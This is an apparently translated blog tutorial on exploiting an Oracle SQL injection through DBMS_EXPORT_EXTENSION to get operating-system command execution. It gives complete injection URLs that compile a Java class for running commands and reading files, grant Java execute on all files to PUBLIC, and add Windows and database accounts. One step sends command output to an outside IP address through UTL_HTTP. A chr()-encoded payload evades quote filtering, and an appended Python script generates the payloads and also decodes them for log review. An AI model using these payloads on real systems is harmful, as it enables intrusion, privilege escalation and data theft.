Worked example: the full process of getting a cmdshell from an Oracle injection

Posted 2012-12-18 12:21:48
All of the demonstrations below were run in the web-based SQL*Plus. For a web injection, rewrite select SYS.DBMS_EXPORT_EXTENSION..... into the form

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

(the 'a'|| is there so that the condition evaluates to true whatever the subquery returns). The statement is fairly long, so it may have to be sent by POST.
The individual steps are as follows:
1. Create the package
By injecting the SYS.DBMS_EXPORT_EXTENSION function, create a Java class LinxUtil (a Java source object) in the Oracle server with two methods: runCMD executes an operating system command and readFile reads a file:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
If the URL length is limited, the readFile() method can be left out, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
and also drop the statements in the later steps that deal with readFile().
------------------------------
2. Grant the Java permission
Runtime.exec() requires java.io.FilePermission with the execute action; granting it on <<ALL FILES>> to PUBLIC is what allows the stored Java to start any program:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. Create the functions
These PL/SQL call specifications wrap the two Java methods. Because the DDL runs as SYS, both functions land in the SYS schema, which is why the later steps call them as sys.LinxRunCMD and sys.LinxReadFile:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant PUBLIC the right to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. Test whether the steps above succeeded
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
If the function exists, the subquery returns its OBJECT_ID and the page renders normally; if it does not, the subquery returns NULL, the condition is not true, and the query returns no rows.
6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)

Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>".
To see the output of the command, use a union (the column count and types must match the original query):
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
or UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)
Note: when using UTL_HTTP.request, the spaces and newlines must be replaced with REPLACE(), otherwise the HTTP request cannot be sent. The newline has to be written as chr(10): Oracle string literals have no backslash escapes, so '\n' is just the two characters backslash and n and would never match the newlines that runCMD() appends. utl_encode.base64_encode works as well (it takes RAW input, so wrap the string in utl_raw.cast_to_raw() and the result in utl_raw.cast_to_varchar2()).
--------------------
7. Internal changes
The changes to all_objects can be seen with:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
Unquoted identifiers are stored in upper case, so '%LINX%' matches the two functions; '%Linx%' is needed for the quoted name "LinxUtil", which keeps its mixed case.
8. Delete the functions we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
The same statement with drop function LinxReadFile and drop java source "LinxUtil" removes the other function and the Java class.
====================================================
End of article. Dedicated to my friends.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test for the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
i.e., with every literal written as a chr() chain so that the request contains no quote characters:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
Confirm that the vulnerability exists:
1<>(
select user_id from all_users where username='LINXSQL'
)
Give linxsql the CONNECT privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Delete the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The following creates a general-purpose function Linx_query() that executes whatever statement it is given and returns the number 1 on success. Its privileges are inherited from the caller (authid current_user), however, so it may have nothing beyond the PUBLIC privileges and seems of little use; if it is really needed, consider a grant dba to the current user first:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
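As an added example (not part of the original post and not the author's tool), the following Python reproduces the quoting mechanics behind every payload above: the statement to run sits inside EXECUTE IMMEDIATE, inside a PL/SQL block that is itself a string inside EXECUTE IMMEDIATE, inside the SQL literal passed as the third argument, so each level doubles the single quotes and the innermost statement ends up with eight quotes per quote. It also builds the chr()-encoded form from the "another way to test" section and decodes such chains back into literals, which is what you need when one of these requests shows up in a web server log. The page name /xxx.jsp, the FOO/BAR arguments and the statements are the post's own; the function names and the 1 versus :P1 argument to PUT() being a parameter are assumptions of this example.

```python
import re

# Added example, not the post author's tool. It reproduces the quoting of the
# payloads in this post. The vulnerable call is
#   SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',<plsql>,'SYS',0,'1',0)
# <plsql> is a SQL string literal (level 1). Inside it, EXECUTE IMMEDIATE runs
# a PL/SQL block passed as a string (level 2), and that block runs the wanted
# statement through a second EXECUTE IMMEDIATE (level 3). Every level doubles
# each single quote, so a quote in the innermost statement appears 8 times in
# the request, which is the '''''''' seen in the dbms_java.grant_permission step.


def esc(s: str) -> str:
    """Embed s in an Oracle single-quoted literal: one nesting level."""
    return s.replace("'", "''")


def plsql_body(stmt: str, bind: str = "1") -> str:
    """PL/SQL that the vulnerable function executes as SYS.

    DBMS_OUTPUT".PUT(...) terminates the identifier the vulnerable code is
    building; PRAGMA AUTONOMOUS_TRANSACTION allows DDL inside a SELECT.
    The post passes 1 to PUT() in most steps and :P1 in a few; both forms
    are on the page, so the argument is a parameter here (assumption).
    """
    block = ("DECLARE PRAGMA AUTONOMOUS_TRANSACTION;"
             "BEGIN EXECUTE IMMEDIATE '" + esc(stmt) + "';END;")
    return ('DBMS_OUTPUT".PUT(' + bind + ');'
            "EXECUTE IMMEDIATE '" + esc(block) + "';END;--")


def payload(stmt: str, bind: str = "1") -> str:
    """Full SELECT as written in the post, the PL/SQL quoted once more."""
    return ("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','"
            + esc(plsql_body(stmt, bind)) + "','SYS',0,'1',0) from dual")


def injected_url(stmt: str, page: str = "/xxx.jsp?id=1") -> str:
    """The boolean wrapper from the post. '1'<>'a'||(subquery) is true no
    matter what the subquery returns, so the page renders as usual while
    the DDL runs as a side effect. /xxx.jsp is the post's placeholder."""
    return page + " and '1'<>'a'||(" + payload(stmt) + ")"


def chr_encode(s: str) -> str:
    """Write a literal as chr(n)||chr(n)||... so the request contains no
    quote characters; the post does this for the CREATE USER test."""
    return "||".join("chr(%d)" % ord(c) for c in s)


def payload_chr(stmt: str, bind: str = ":P1") -> str:
    """payload() with every literal replaced by a chr() chain. plsql_body()
    is encoded without esc(): chr() yields the string directly, so the
    outermost quote doubling disappears (the chr(39) runs on the page are
    only the level-2 and level-3 quotes)."""
    args = [chr_encode("FOO"), chr_encode("BAR"),
            chr_encode(plsql_body(stmt, bind)),
            chr_encode("SYS"), "0", chr_encode("1"), "0"]
    return ("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES("
            + ",".join(args) + ") from dual")


_CHAIN = re.compile(r"chr\(\d+\)(?:\|\|chr\(\d+\))*")


def decode_chr_chains(expr: str) -> str:
    """Reverse of payload_chr(): turn each chr()||chr() run back into a
    quoted literal. Useful when such payloads turn up in web server logs,
    since the chr() form exists to keep keywords like CREATE USER out of
    the request."""
    def literal(m):
        text = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
        return "'" + esc(text) + "'"
    return _CHAIN.sub(literal, expr)


if __name__ == "__main__":
    print(injected_url("grant all on LinxRunCMD to public"))
    print(payload_chr("CREATE USER linxsql IDENTIFIED BY linxsql"))
    print(decode_chr_chains(payload_chr("CREATE USER linxsql IDENTIFIED BY linxsql")))
```

Running it prints the step 4 grant exactly as it appears above, then the chr() form of the CREATE USER test, then that form decoded back into the plain-quoted SELECT. For log review, feed the query string of a suspicious request to decode_chr_chains() and the keywords reappear.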
